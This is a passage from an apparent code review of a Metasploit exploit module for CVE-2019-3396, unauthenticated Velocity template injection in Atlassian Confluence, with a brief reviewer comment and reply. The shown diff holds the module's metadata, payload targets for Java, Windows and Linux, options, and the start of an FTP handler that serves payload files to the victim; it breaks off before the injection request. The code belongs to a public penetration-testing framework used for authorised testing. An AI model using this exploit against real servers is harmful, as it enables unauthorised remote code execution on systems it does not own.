modules/exploits/multi/http/confluence_widget_connector.rb

```diff
@@ -0,0 +1,494 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'json'
+require 'uri'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::FtpServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
+      'Description'    => %q{
+        Widget Connector Macro is part of Atlassian Confluence Server and Data Center that
+        allows embed online videos, slideshows, photostreams and more directly into page. 
+        A _template parameter can be used to inject remote Java code into a Velocity template, 
+        and gain code execution. Authentication is unrequired to exploit this vulnerability. 
+        By default, Java payload will be used because it is cross-platform, but you can also 
+        specify which native payload you want (Linux or Windows).
+
+        Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 
+        6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.
+
+        This vulnerability was originally discovered by Daniil Dmitriev
+        https://twitter.com/ddv_ua.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Dmitry (rrock) Shchannikov'      # Metasploit
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-3396' ],
+          [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ]
+        ],
+      'Targets'        =>
+        [
+          [ 'Java',    { 'Platform' => 'java',  'Arch' => ARCH_JAVA }],
+          [ 'Windows', { 'Platform' => 'win',   'Arch' => ARCH_X86  }],
+          [ 'Linux',   { 'Platform' => 'linux', 'Arch' => ARCH_X86  }]
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 80,
+          'SRVPORT' => 8021,
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'Mar 25 2019',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
+        OptInt.new('ListenerTimeout', [false, 'Time that the Listener will wait for the payload request', 10])
+      ])
+  end
+
+  # Handles ftp RETP command.
+  #
+  # @param c [Socket] Control connection socket.
+  # @param arg [String] RETR argument.
+  # @return [void]
+  def on_client_command_retr(c,arg)
+    vprint_status("FTP download request for #{arg}")
+    conn = establish_data_connection(c)
+    if(not conn)
+      c.put("425 Can't build data connection\r\n")
+      return
+    end
+
+    c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
+    if /check\.vm$/ === arg
```

Comment:
This should probably be a `case` statement.

Reply:
Done.